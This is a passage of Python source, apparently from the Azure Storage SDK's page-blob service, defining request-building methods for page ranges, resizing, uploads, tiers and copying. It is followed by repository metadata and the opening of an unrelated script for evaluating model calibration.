'If-Unmodified-Since': _datetime_to_utc_string(if_unmodified_since),
'If-Match': _to_str(if_match),
'If-None-Match': _to_str(if_none_match)
}
_validate_and_format_range_headers(
request,
start_range,
end_range,
align_to_page=True)
return self._perform_request(request, _parse_page_properties)
def get_page_ranges(
self, container_name, blob_name, snapshot=None, start_range=None,
end_range=None, lease_id=None, if_modified_since=None,
if_unmodified_since=None, if_match=None, if_none_match=None, timeout=None):
'''
Returns the list of valid page ranges for a Page Blob or snapshot
of a page blob.
:param str container_name:
Name of existing container.
:param str blob_name:
Name of existing blob.
:param str snapshot:
The snapshot parameter is an opaque DateTime value that,
when present, specifies the blob snapshot to retrieve information
from.
:param int start_range:
Start of byte range to use for getting valid page ranges.
If no end_range is given, all bytes after the start_range will be searched.
Pages must be aligned with 512-byte boundaries, the start offset
must be a modulus of 512 and the end offset must be a modulus of
512-1. Examples of valid byte ranges are 0-511, 512-, etc.
:param int end_range:
End of byte range to use for getting valid page ranges.
If end_range is given, start_range must be provided.
This range will return valid page ranges for from the offset start up to
offset end.
Pages must be aligned with 512-byte boundaries, the start offset
must be a modulus of 512 and the end offset must be a modulus of
512-1. Examples of valid byte ranges are 0-511, 512-, etc.
:param str lease_id:
Required if the blob has an active lease.
:param datetime if_modified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this header to perform the operation only
if the resource has been modified since the specified time.
:param datetime if_unmodified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this header to perform the operation only if
the resource has not been modified since the specified date/time.
:param str if_match:
An ETag value, or the wildcard character (*). Specify this header to perform
the operation only if the resource's ETag matches the value specified.
:param str if_none_match:
An ETag value, or the wildcard character (*). Specify this header
to perform the operation only if the resource's ETag does not match
the value specified. Specify the wildcard character (*) to perform
the operation only if the resource does not exist, and fail the
operation if it does exist.
:param int timeout:
The timeout parameter is expressed in seconds.
:return: A list of valid Page Ranges for the Page Blob.
:rtype: list(:class:`~azure.storage.blob.models.PageRange`)
'''
_validate_not_none('container_name', container_name)
_validate_not_none('blob_name', blob_name)
request = HTTPRequest()
request.method = 'GET'
request.host_locations = self._get_host_locations(secondary=True)
request.path = _get_path(container_name, blob_name)
request.query = {
'comp': 'pagelist',
'snapshot': _to_str(snapshot),
'timeout': _int_to_str(timeout),
}
request.headers = {
'x-ms-lease-id': _to_str(lease_id),
'If-Modified-Since': _datetime_to_utc_string(if_modified_since),
'If-Unmodified-Since': _datetime_to_utc_string(if_unmodified_since),
'If-Match': _to_str(if_match),
'If-None-Match': _to_str(if_none_match),
}
if start_range is not None:
_validate_and_format_range_headers(
request,
start_range,
end_range,
start_range_required=False,
end_range_required=False,
align_to_page=True)
return self._perform_request(request, _convert_xml_to_page_ranges)
def get_page_ranges_diff(
self, container_name, blob_name, previous_snapshot, snapshot=None,
start_range=None, end_range=None, lease_id=None, if_modified_since=None,
if_unmodified_since=None, if_match=None, if_none_match=None, timeout=None):
'''
The response will include only the pages that are different between either a
recent snapshot or the current blob and a previous snapshot, including pages
that were cleared.
:param str container_name:
Name of existing container.
:param str blob_name:
Name of existing blob.
:param str previous_snapshot:
The snapshot parameter is an opaque DateTime value that
specifies a previous blob snapshot to be compared
against a more recent snapshot or the current blob.
:param str snapshot:
The snapshot parameter is an opaque DateTime value that
specifies a more recent blob snapshot to be compared
against a previous snapshot (previous_snapshot).
:param int start_range:
Start of byte range to use for getting different page ranges.
If no end_range is given, all bytes after the start_range will be searched.
Pages must be aligned with 512-byte boundaries, the start offset
must be a modulus of 512 and the end offset must be a modulus of
512-1. Examples of valid byte ranges are 0-511, 512-, etc.
:param int end_range:
End of byte range to use for getting different page ranges.
If end_range is given, start_range must be provided.
This range will return valid page ranges for from the offset start up to
offset end.
Pages must be aligned with 512-byte boundaries, the start offset
must be a modulus of 512 and the end offset must be a modulus of
512-1. Examples of valid byte ranges are 0-511, 512-, etc.
:param str lease_id:
Required if the blob has an active lease.
:param datetime if_modified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this header to perform the operation only
if the resource has been modified since the specified time.
:param datetime if_unmodified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this header to perform the operation only if
the resource has not been modified since the specified date/time.
:param str if_match:
An ETag value, or the wildcard character (*). Specify this header to perform
the operation only if the resource's ETag matches the value specified.
:param str if_none_match:
An ETag value, or the wildcard character (*). Specify this header
to perform the operation only if the resource's ETag does not match
the value specified. Specify the wildcard character (*) to perform
the operation only if the resource does not exist, and fail the
operation if it does exist.
:param int timeout:
The timeout parameter is expressed in seconds.
:return: A list of different Page Ranges for the Page Blob.
:rtype: list(:class:`~azure.storage.blob.models.PageRange`)
'''
_validate_not_none('container_name', container_name)
_validate_not_none('blob_name', blob_name)
_validate_not_none('previous_snapshot', previous_snapshot)
request = HTTPRequest()
request.method = 'GET'
request.host_locations = self._get_host_locations(secondary=True)
request.path = _get_path(container_name, blob_name)
request.query = {
'comp': 'pagelist',
'snapshot': _to_str(snapshot),
'prevsnapshot': _to_str(previous_snapshot),
'timeout': _int_to_str(timeout),
}
request.headers = {
'x-ms-lease-id': _to_str(lease_id),
'If-Modified-Since': _datetime_to_utc_string(if_modified_since),
'If-Unmodified-Since': _datetime_to_utc_string(if_unmodified_since),
'If-Match': _to_str(if_match),
'If-None-Match': _to_str(if_none_match),
}
if start_range is not None:
_validate_and_format_range_headers(
request,
start_range,
end_range,
start_range_required=False,
end_range_required=False,
align_to_page=True)
return self._perform_request(request, _convert_xml_to_page_ranges)
def set_sequence_number(
self, container_name, blob_name, sequence_number_action, sequence_number=None,
lease_id=None, if_modified_since=None, if_unmodified_since=None,
if_match=None, if_none_match=None, timeout=None):
'''
Sets the blob sequence number.
:param str container_name:
Name of existing container.
:param str blob_name:
Name of existing blob.
:param str sequence_number_action:
This property indicates how the service should modify the blob's sequence
number. See :class:`~azure.storage.blob.models.SequenceNumberAction` for more information.
:param str sequence_number:
This property sets the blob's sequence number. The sequence number is a
user-controlled property that you can use to track requests and manage
concurrency issues.
:param str lease_id:
Required if the blob has an active lease.
:param datetime if_modified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this header to perform the operation only
if the resource has been modified since the specified time.
:param datetime if_unmodified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this header to perform the operation only if
the resource has not been modified since the specified date/time.
:param str if_match:
An ETag value, or the wildcard character (*). Specify this header to perform
the operation only if the resource's ETag matches the value specified.
:param str if_none_match:
An ETag value, or the wildcard character (*). Specify this header
to perform the operation only if the resource's ETag does not match
the value specified. Specify the wildcard character (*) to perform
the operation only if the resource does not exist, and fail the
operation if it does exist.
:param int timeout:
The timeout parameter is expressed in seconds.
:return: ETag and last modified properties for the updated Page Blob
:rtype: :class:`~azure.storage.blob.models.ResourceProperties`
'''
_validate_not_none('container_name', container_name)
_validate_not_none('blob_name', blob_name)
_validate_not_none('sequence_number_action', sequence_number_action)
request = HTTPRequest()
request.method = 'PUT'
request.host_locations = self._get_host_locations()
request.path = _get_path(container_name, blob_name)
request.query = {
'comp': 'properties',
'timeout': _int_to_str(timeout),
}
request.headers = {
'x-ms-blob-sequence-number': _to_str(sequence_number),
'x-ms-sequence-number-action': _to_str(sequence_number_action),
'x-ms-lease-id': _to_str(lease_id),
'If-Modified-Since': _datetime_to_utc_string(if_modified_since),
'If-Unmodified-Since': _datetime_to_utc_string(if_unmodified_since),
'If-Match': _to_str(if_match),
'If-None-Match': _to_str(if_none_match),
}
return self._perform_request(request, _parse_page_properties)
def resize_blob(
self, container_name, blob_name, content_length,
lease_id=None, if_modified_since=None, if_unmodified_since=None,
if_match=None, if_none_match=None, timeout=None):
'''
Resizes a page blob to the specified size. If the specified value is less
than the current size of the blob, then all pages above the specified value
are cleared.
:param str container_name:
Name of existing container.
:param str blob_name:
Name of existing blob.
:param int content_length:
Size to resize blob to.
:param str lease_id:
Required if the blob has an active lease.
:param datetime if_modified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this header to perform the operation only
if the resource has been modified since the specified time.
:param datetime if_unmodified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this header to perform the operation only if
the resource has not been modified since the specified date/time.
:param str if_match:
An ETag value, or the wildcard character (*). Specify this header to perform
the operation only if the resource's ETag matches the value specified.
:param str if_none_match:
An ETag value, or the wildcard character (*). Specify this header
to perform the operation only if the resource's ETag does not match
the value specified. Specify the wildcard character (*) to perform
the operation only if the resource does not exist, and fail the
operation if it does exist.
:param int timeout:
The timeout parameter is expressed in seconds.
:return: ETag and last modified properties for the updated Page Blob
:rtype: :class:`~azure.storage.blob.models.ResourceProperties`
'''
_validate_not_none('container_name', container_name)
_validate_not_none('blob_name', blob_name)
_validate_not_none('content_length', content_length)
request = HTTPRequest()
request.method = 'PUT'
request.host_locations = self._get_host_locations()
request.path = _get_path(container_name, blob_name)
request.query = {
'comp': 'properties',
'timeout': _int_to_str(timeout),
}
request.headers = {
'x-ms-blob-content-length': _to_str(content_length),
'x-ms-lease-id': _to_str(lease_id),
'If-Modified-Since': _datetime_to_utc_string(if_modified_since),
'If-Unmodified-Since': _datetime_to_utc_string(if_unmodified_since),
'If-Match': _to_str(if_match),
'If-None-Match': _to_str(if_none_match),
}
return self._perform_request(request, _parse_page_properties)
# ----Convenience APIs-----------------------------------------------------
def create_blob_from_path(
self, container_name, blob_name, file_path, content_settings=None,
metadata=None, validate_content=False, progress_callback=None, max_connections=2,
lease_id=None, if_modified_since=None, if_unmodified_since=None,
if_match=None, if_none_match=None, timeout=None, premium_page_blob_tier=None):
'''
Creates a new blob from a file path, or updates the content of an
existing blob, with automatic chunking and progress notifications.
Empty chunks are skipped, while non-emtpy ones(even if only partly filled) are uploaded.
:param str container_name:
Name of existing container.
:param str blob_name:
Name of blob to create or update.
:param str file_path:
Path of the file to upload as the blob content.
:param ~azure.storage.blob.models.ContentSettings content_settings:
ContentSettings object used to set blob properties.
:param metadata:
Name-value pairs associated with the blob as metadata.
:type metadata: dict(str, str)
:param bool validate_content:
If true, calculates an MD5 hash for each page of the blob. The storage
service checks the hash of the content that has arrived with the hash
that was sent. This is primarily valuable for detecting bitflips on
the wire if using http instead of https as https (the default) will
already validate. Note that this MD5 hash is not stored with the
blob.
:param progress_callback:
Callback for progress with signature function(current, total) where
current is the number of bytes transfered so far, and total is the
size of the blob, or None if the total size is unknown.
:type progress_callback: func(current, total)
:param int max_connections:
Maximum number of parallel connections to use.
:param str lease_id:
Required if the blob has an active lease.
:param datetime if_modified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this header to perform the operation only
if the resource has been modified since the specified time.
:param datetime if_unmodified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this header to perform the operation only if
the resource has not been modified since the specified date/time.
:param str if_match:
An ETag value, or the wildcard character (*). Specify this header to perform
the operation only if the resource's ETag matches the value specified.
:param str if_none_match:
An ETag value, or the wildcard character (*). Specify this header
to perform the operation only if the resource's ETag does not match
the value specified. Specify the wildcard character (*) to perform
the operation only if the resource does not exist, and fail the
operation if it does exist.
:param int timeout:
The timeout parameter is expressed in seconds. This method may make
multiple calls to the Azure service and the timeout will apply to
each call individually.
:param premium_page_blob_tier:
A page blob tier value to set the blob to. The tier correlates to the size of the
blob and number of allowed IOPS. This is only applicable to page blobs on
premium storage accounts.
:return: ETag and last modified properties for the Page Blob
:rtype: :class:`~azure.storage.blob.models.ResourceProperties`
'''
_validate_not_none('container_name', container_name)
_validate_not_none('blob_name', blob_name)
_validate_not_none('file_path', file_path)
count = path.getsize(file_path)
with open(file_path, 'rb') as stream:
return self.create_blob_from_stream(
container_name=container_name,
blob_name=blob_name,
stream=stream,
count=count,
content_settings=content_settings,
metadata=metadata,
validate_content=validate_content,
progress_callback=progress_callback,
max_connections=max_connections,
lease_id=lease_id,
if_modified_since=if_modified_since,
if_unmodified_since=if_unmodified_since,
if_match=if_match,
if_none_match=if_none_match,
timeout=timeout,
premium_page_blob_tier=premium_page_blob_tier)
def create_blob_from_stream(
self, container_name, blob_name, stream, count, content_settings=None,
metadata=None, validate_content=False, progress_callback=None,
max_connections=2, lease_id=None, if_modified_since=None,
if_unmodified_since=None, if_match=None, if_none_match=None, timeout=None,
premium_page_blob_tier=None):
'''
Creates a new blob from a file/stream, or updates the content of an
existing blob, with automatic chunking and progress notifications.
Empty chunks are skipped, while non-emtpy ones(even if only partly filled) are uploaded.
:param str container_name:
Name of existing container.
:param str blob_name:
Name of blob to create or update.
:param io.IOBase stream:
Opened file/stream to upload as the blob content.
:param int count:
Number of bytes to read from the stream. This is required, a page
blob cannot be created if the count is unknown.
:param ~azure.storage.blob.models.ContentSettings content_settings:
ContentSettings object used to set the blob properties.
:param metadata:
Name-value pairs associated with the blob as metadata.
:type metadata: dict(str, str)
:param bool validate_content:
If true, calculates an MD5 hash for each page of the blob. The storage
service checks the hash of the content that has arrived with the hash
that was sent. This is primarily valuable for detecting bitflips on
the wire if using http instead of https as https (the default) will
already validate. Note that this MD5 hash is not stored with the
blob.
:param progress_callback:
Callback for progress with signature function(current, total) where
current is the number of bytes transfered so far, and total is the
size of the blob, or None if the total size is unknown.
:type progress_callback: func(current, total)
:param int max_connections:
Maximum number of parallel connections to use. Note that parallel upload
requires the stream to be seekable.
:param str lease_id:
Required if the blob has an active lease.
:param datetime if_modified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this header to perform the operation only
if the resource has been modified since the specified time.
:param datetime if_unmodified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this header to perform the operation only if
the resource has not been modified since the specified date/time.
:param str if_match:
An ETag value, or the wildcard character (*). Specify this header to perform
the operation only if the resource's ETag matches the value specified.
:param str if_none_match:
An ETag value, or the wildcard character (*). Specify this header
to perform the operation only if the resource's ETag does not match
the value specified. Specify the wildcard character (*) to perform
the operation only if the resource does not exist, and fail the
operation if it does exist.
:param int timeout:
The timeout parameter is expressed in seconds. This method may make
multiple calls to the Azure service and the timeout will apply to
each call individually.
:param premium_page_blob_tier:
A page blob tier value to set the blob to. The tier correlates to the size of the
blob and number of allowed IOPS. This is only applicable to page blobs on
premium storage accounts.
:return: ETag and last modified properties for the Page Blob
:rtype: :class:`~azure.storage.blob.models.ResourceProperties`
'''
_validate_not_none('container_name', container_name)
_validate_not_none('blob_name', blob_name)
_validate_not_none('stream', stream)
_validate_not_none('count', count)
_validate_encryption_required(self.require_encryption, self.key_encryption_key)
if count < 0:
raise ValueError(_ERROR_VALUE_NEGATIVE.format('count'))
if count % _PAGE_ALIGNMENT != 0:
raise ValueError(_ERROR_PAGE_BLOB_SIZE_ALIGNMENT.format(count))
cek, iv, encryption_data = None, None, None
if self.key_encryption_key is not None:
cek, iv, encryption_data = _generate_blob_encryption_data(self.key_encryption_key)
response = self._create_blob(
container_name=container_name,
blob_name=blob_name,
content_length=count,
content_settings=content_settings,
metadata=metadata,
lease_id=lease_id,
premium_page_blob_tier=premium_page_blob_tier,
if_modified_since=if_modified_since,
if_unmodified_since=if_unmodified_since,
if_match=if_match,
if_none_match=if_none_match,
timeout=timeout,
encryption_data=encryption_data
)
if count == 0:
return response
# _upload_blob_chunks returns the block ids for block blobs so resource_properties
# is passed as a parameter to get the last_modified and etag for page and append blobs.
# this info is not needed for block_blobs since _put_block_list is called after which gets this info
resource_properties = ResourceProperties()
_upload_blob_chunks(
blob_service=self,
container_name=container_name,
blob_name=blob_name,
blob_size=count,
block_size=self.MAX_PAGE_SIZE,
stream=stream,
max_connections=max_connections,
progress_callback=progress_callback,
validate_content=validate_content,
lease_id=lease_id,
uploader_class=_PageBlobChunkUploader,
if_match=response.etag,
timeout=timeout,
content_encryption_key=cek,
initialization_vector=iv,
resource_properties=resource_properties
)
return resource_properties
def create_blob_from_bytes(
self, container_name, blob_name, blob, index=0, count=None,
content_settings=None, metadata=None, validate_content=False,
progress_callback=None, max_connections=2, lease_id=None,
if_modified_since=None, if_unmodified_since=None, if_match=None,
if_none_match=None, timeout=None, premium_page_blob_tier=None):
'''
Creates a new blob from an array of bytes, or updates the content
of an existing blob, with automatic chunking and progress
notifications. Empty chunks are skipped, while non-emtpy ones(even if only partly filled) are uploaded.
:param str container_name:
Name of existing container.
:param str blob_name:
Name of blob to create or update.
:param bytes blob:
Content of blob as an array of bytes.
:param int index:
Start index in the byte array.
:param int count:
Number of bytes to upload. Set to None or negative value to upload
all bytes starting from index.
:param ~azure.storage.blob.models.ContentSettings content_settings:
ContentSettings object used to set blob properties.
:param metadata:
Name-value pairs associated with the blob as metadata.
:type metadata: dict(str, str)
:param bool validate_content:
If true, calculates an MD5 hash for each page of the blob. The storage
service checks the hash of the content that has arrived with the hash
that was sent. This is primarily valuable for detecting bitflips on
the wire if using http instead of https as https (the default) will
already validate. Note that this MD5 hash is not stored with the
blob.
:param progress_callback:
Callback for progress with signature function(current, total) where
current is the number of bytes transfered so far, and total is the
size of the blob, or None if the total size is unknown.
:type progress_callback: func(current, total)
:param int max_connections:
Maximum number of parallel connections to use.
:param str lease_id:
Required if the blob has an active lease.
:param datetime if_modified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this header to perform the operation only
if the resource has been modified since the specified time.
:param datetime if_unmodified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this header to perform the operation only if
the resource has not been modified since the specified date/time.
:param str if_match:
An ETag value, or the wildcard character (*). Specify this header to perform
the operation only if the resource's ETag matches the value specified.
:param str if_none_match:
An ETag value, or the wildcard character (*). Specify this header
to perform the operation only if the resource's ETag does not match
the value specified. Specify the wildcard character (*) to perform
the operation only if the resource does not exist, and fail the
operation if it does exist.
:param int timeout:
The timeout parameter is expressed in seconds. This method may make
multiple calls to the Azure service and the timeout will apply to
each call individually.
:param premium_page_blob_tier:
A page blob tier value to set the blob to. The tier correlates to the size of the
blob and number of allowed IOPS. This is only applicable to page blobs on
premium storage accounts.
:return: ETag and last modified properties for the Page Blob
:rtype: :class:`~azure.storage.blob.models.ResourceProperties`
'''
_validate_not_none('container_name', container_name)
_validate_not_none('blob_name', blob_name)
_validate_not_none('blob', blob)
_validate_type_bytes('blob', blob)
if index < 0:
raise IndexError(_ERROR_VALUE_NEGATIVE.format('index'))
if count is None or count < 0:
count = len(blob) - index
stream = BytesIO(blob)
stream.seek(index)
return self.create_blob_from_stream(
container_name=container_name,
blob_name=blob_name,
stream=stream,
count=count,
content_settings=content_settings,
metadata=metadata,
validate_content=validate_content,
lease_id=lease_id,
progress_callback=progress_callback,
max_connections=max_connections,
if_modified_since=if_modified_since,
if_unmodified_since=if_unmodified_since,
if_match=if_match,
if_none_match=if_none_match,
timeout=timeout,
premium_page_blob_tier=premium_page_blob_tier)
def set_premium_page_blob_tier(
self, container_name, blob_name, premium_page_blob_tier,
timeout=None):
'''
Sets the page blob tiers on the blob. This API is only supported for page blobs on premium accounts.
:param str container_name:
Name of existing container.
:param str blob_name:
Name of blob to update.
:param PremiumPageBlobTier premium_page_blob_tier:
A page blob tier value to set the blob to. The tier correlates to the size of the
blob and number of allowed IOPS. This is only applicable to page blobs on
premium storage accounts.
:param int timeout:
The timeout parameter is expressed in seconds. This method may make
multiple calls to the Azure service and the timeout will apply to
each call individually.
'''
_validate_not_none('container_name', container_name)
_validate_not_none('blob_name', blob_name)
_validate_not_none('premium_page_blob_tier', premium_page_blob_tier)
request = HTTPRequest()
request.method = 'PUT'
request.host_locations = self._get_host_locations()
request.path = _get_path(container_name, blob_name)
request.query = {
'comp': 'tier',
'timeout': _int_to_str(timeout),
}
request.headers = {
'x-ms-access-tier': _to_str(premium_page_blob_tier)
}
self._perform_request(request)
def copy_blob(self, container_name, blob_name, copy_source,
metadata=None,
source_if_modified_since=None,
source_if_unmodified_since=None,
source_if_match=None, source_if_none_match=None,
destination_if_modified_since=None,
destination_if_unmodified_since=None,
destination_if_match=None,
destination_if_none_match=None,
destination_lease_id=None,
source_lease_id=None, timeout=None,
premium_page_blob_tier=None):
'''
Copies a blob asynchronously. This operation returns a copy operation
properties object, including a copy ID you can use to check or abort the
copy operation. The Blob service copies blobs on a best-effort basis.
The source blob for a copy operation must be a page blob. If the destination
blob already exists, it must be of the same blob type as the source blob.
Any existing destination blob will be overwritten.
The destination blob cannot be modified while a copy operation is in progress.
When copying from a page blob, the Blob service creates a destination page
blob of the source blob's length, initially containing all zeroes. Then
the source page ranges are enumerated, and non-empty ranges are copied.
If the tier on the source blob is larger than the tier being passed to this
copy operation or if the size of the blob exceeds the tier being passed to
this copy operation then the operation will fail.
You can call get_blob_properties on the destination
blob to check the status of the copy operation. The final blob will be
committed when the copy completes.
:param str container_name:
Name of the destination container. The container must exist.
:param str blob_name:
Name of the destination blob. If the destination blob exists, it will
be overwritten. Otherwise, it will be created.
:param str copy_source:
A URL of up to 2 KB in length that specifies an Azure file or blob.
The value should be URL-encoded as it would appear in a request URI.
If the source is in another account, the source must either be public
or must be authenticated via a shared access signature. If the source
is public, no authentication is required.
Examples:
https://myaccount.blob.core.windows.net/mycontainer/myblob
https://myaccount.blob.core.windows.net/mycontainer/myblob?snapshot=<DateTime>
https://otheraccount.blob.core.windows.net/mycontainer/myblob?sastoken
:param metadata:
Name-value pairs associated with the blob as metadata. If no name-value
pairs are specified, the operation will copy the metadata from the
source blob or file to the destination blob. If one or more name-value
pairs are specified, the destination blob is created with the specified
metadata, and metadata is not copied from the source blob or file.
:type metadata: dict(str, str).
:param datetime source_if_modified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this conditional header to copy the blob only if the source
blob has been modified since the specified date/time.
:param datetime source_if_unmodified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this conditional header to copy the blob only if the source blob
has not been modified since the specified date/time.
:param ETag source_if_match:
An ETag value, or the wildcard character (*). Specify this conditional
header to copy the source blob only if its ETag matches the value
specified. If the ETag values do not match, the Blob service returns
status code 412 (Precondition Failed). This header cannot be specified
if the source is an Azure File.
:param ETag source_if_none_match:
An ETag value, or the wildcard character (*). Specify this conditional
header to copy the blob only if its ETag does not match the value
specified. If the values are identical, the Blob service returns status
code 412 (Precondition Failed). This header cannot be specified if the
source is an Azure File.
:param datetime destination_if_modified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this conditional header to copy the blob only
if the destination blob has been modified since the specified date/time.
If the destination blob has not been modified, the Blob service returns
status code 412 (Precondition Failed).
:param datetime destination_if_unmodified_since:
A DateTime value. Azure expects the date value passed in to be UTC.
If timezone is included, any non-UTC datetimes will be converted to UTC.
If a date is passed in without timezone info, it is assumed to be UTC.
Specify this conditional header to copy the blob only
if the destination blob has not been modified since the specified
date/time. If the destination blob has been modified, the Blob service
returns status code 412 (Precondition Failed).
:param ETag destination_if_match:
An ETag value, or the wildcard character (*). Specify an ETag value for
this conditional header to copy the blob only if the specified ETag value
matches the ETag value for an existing destination blob. If the ETag for
the destination blob does not match the ETag specified for If-Match, the
Blob service returns status code 412 (Precondition Failed).
:param ETag destination_if_none_match:
An ETag value, or the wildcard character (*). Specify an ETag value for
this conditional header to copy the blob only if the specified ETag value
does not match the ETag value for the destination blob. Specify the wildcard
character (*) to perform the operation only if the destination blob does not
exist. If the specified condition isn't met, the Blob service returns status
code 412 (Precondition Failed).
:param str destination_lease_id:
The lease ID specified for this header must match the lease ID of the
destination blob. If the request does not include the lease ID or it is not
valid, the operation fails with status code 412 (Precondition Failed).
:param str source_lease_id:
Specify this to perform the Copy Blob operation only if
the lease ID given matches the active lease ID of the source blob.
:param int timeout:
The timeout parameter is expressed in seconds.
:param PageBlobTier premium_page_blob_tier:
A page blob tier value to set on the destination blob. The tier correlates to
the size of the blob and number of allowed IOPS. This is only applicable to
page blobs on premium storage accounts.
If the tier on the source blob is larger than the tier being passed to this
copy operation or if the size of the blob exceeds the tier being passed to
this copy operation then the operation will fail.
:return: Copy operation properties such as status, source, and ID.
:rtype: :class:`~azure.storage.blob.models.CopyProperties`
'''
return self._copy_blob(container_name, blob_name, copy_source,
metadata, premium_page_blob_tier,
source_if_modified_since, source_if_unmodified_since,
source_if_match, source_if_none_match,
destination_if_modified_since,
destination_if_unmodified_since,
destination_if_match,
destination_if_none_match,
destination_lease_id,
source_lease_id, timeout,
False)
# -----Helper methods-----------------------------------------------------
def _create_blob(
self, container_name, blob_name, content_length, content_settings=None,
sequence_number=None, metadata=None, lease_id=None, premium_page_blob_tier=None, if_modified_since=None,
if_unmodified_since=None, if_match=None, if_none_match=None, timeout=None,
encryption_data=None):
'''
See create_blob for more details. This helper method
allows for encryption or other such special behavior because
it is safely handled by the library. These behaviors are
prohibited in the public version of this function.
:param str encryption_data:
The JSON formatted encryption metadata to upload as a part of the blob.
This should only be passed internally from other methods and only applied
when uploading entire blob contents immediately follows creation of the blob.
'''
_validate_not_none('container_name', container_name)
_validate_not_none('blob_name', blob_name)
_validate_not_none('content_length', content_length)
request = HTTPRequest()
request.method = 'PUT'
request.host_locations = self._get_host_locations()
request.path = _get_path(container_name, blob_name)
request.query = {'timeout': _int_to_str(timeout)}
request.headers = {
'x-ms-blob-type': _to_str(self.blob_type),
'x-ms-blob-content-length': _to_str(content_length),
'x-ms-lease-id': _to_str(lease_id),
'x-ms-blob-sequence-number': _to_str(sequence_number),
'x-ms-access-tier': _to_str(premium_page_blob_tier),
'If-Modified-Since': _datetime_to_utc_string(if_modified_since),
'If-Unmodified-Since': _datetime_to_utc_string(if_unmodified_since),
'If-Match': _to_str(if_match),
'If-None-Match': _to_str(if_none_match)
}
_add_metadata_headers(metadata, request)
if content_settings is not None:
request.headers.update(content_settings._to_headers())
if encryption_data is not None:
request.headers['x-ms-meta-encryptiondata'] = encryption_data
return self._perform_request(request, _parse_base_properties)
def _update_page(
self, container_name, blob_name, page, start_range, end_range,
validate_content=False, lease_id=None, if_sequence_number_lte=None,
if_sequence_number_lt=None, if_sequence_number_eq=None,
if_modified_since=None, if_unmodified_since=None,
if_match=None, if_none_match=None, timeout=None):
'''
See update_page for more details. This helper method
allows for encryption or other such special behavior because
it is safely handled by the library. These behaviors are
prohibited in the public version of this function.
'''
request = HTTPRequest()
request.method = 'PUT'
request.host_locations = self._get_host_locations()
request.path = _get_path(container_name, blob_name)
request.query = {
'comp': 'page',
'timeout': _int_to_str(timeout),
}
request.headers = {
'x-ms-page-write': 'update',
'x-ms-lease-id': _to_str(lease_id),
'x-ms-if-sequence-number-le': _to_str(if_sequence_number_lte),
'x-ms-if-sequence-number-lt': _to_str(if_sequence_number_lt),
'x-ms-if-sequence-number-eq': _to_str(if_sequence_number_eq),
'If-Modified-Since': _datetime_to_utc_string(if_modified_since),
'If-Unmodified-Since': _datetime_to_utc_string(if_unmodified_since),
'If-Match': _to_str(if_match),
'If-None-Match': _to_str(if_none_match)
}
_validate_and_format_range_headers(
request,
start_range,
end_range,
align_to_page=True)
request.body = _get_data_bytes_only('page', page)
if validate_content:
computed_md5 = _get_content_md5(request.body)
request.headers['Content-MD5'] = _to_str(computed_md5)
return self._perform_request(request, _parse_page_properties)
| 53.880499
| 118
| 0.654716
|
7f8bb0d4ca1c87794dcdfd2f043b728d54955e42
| 4,380
|
py
|
Python
|
eval/eval_calibration.py
|
dallascard/ACT
|
af3b88a89153d66dc421932c2abbf3792d7a1c37
|
[
"Apache-2.0"
] | null | null | null |
eval/eval_calibration.py
|
dallascard/ACT
|
af3b88a89153d66dc421932c2abbf3792d7a1c37
|
[
"Apache-2.0"
] | null | null | null |
eval/eval_calibration.py
|
dallascard/ACT
|
af3b88a89153d66dc421932c2abbf3792d7a1c37
|
[
"Apache-2.0"
] | null | null | null |
from optparse import OptionParser
import numpy as np
# Evaluate the overall calibration of the output of a mdoel
def main():
usage = "%prog output.npz [output2.npz ...]"
parser = OptionParser(usage=usage)
parser.add_option('-n', dest='n_bins', default=10,
help='Number of bins: default=%default')
parser.add_option('--exp', action="store_true", dest="exp", default=False,
help='Exponentiate the log-probs: default=%default')
parser.add_option('-v', action="store_true", dest="verbose", default=False,
help='Print details: default=%default')
(options, args) = parser.parse_args()
infiles = args
n_bins = int(options.n_bins)
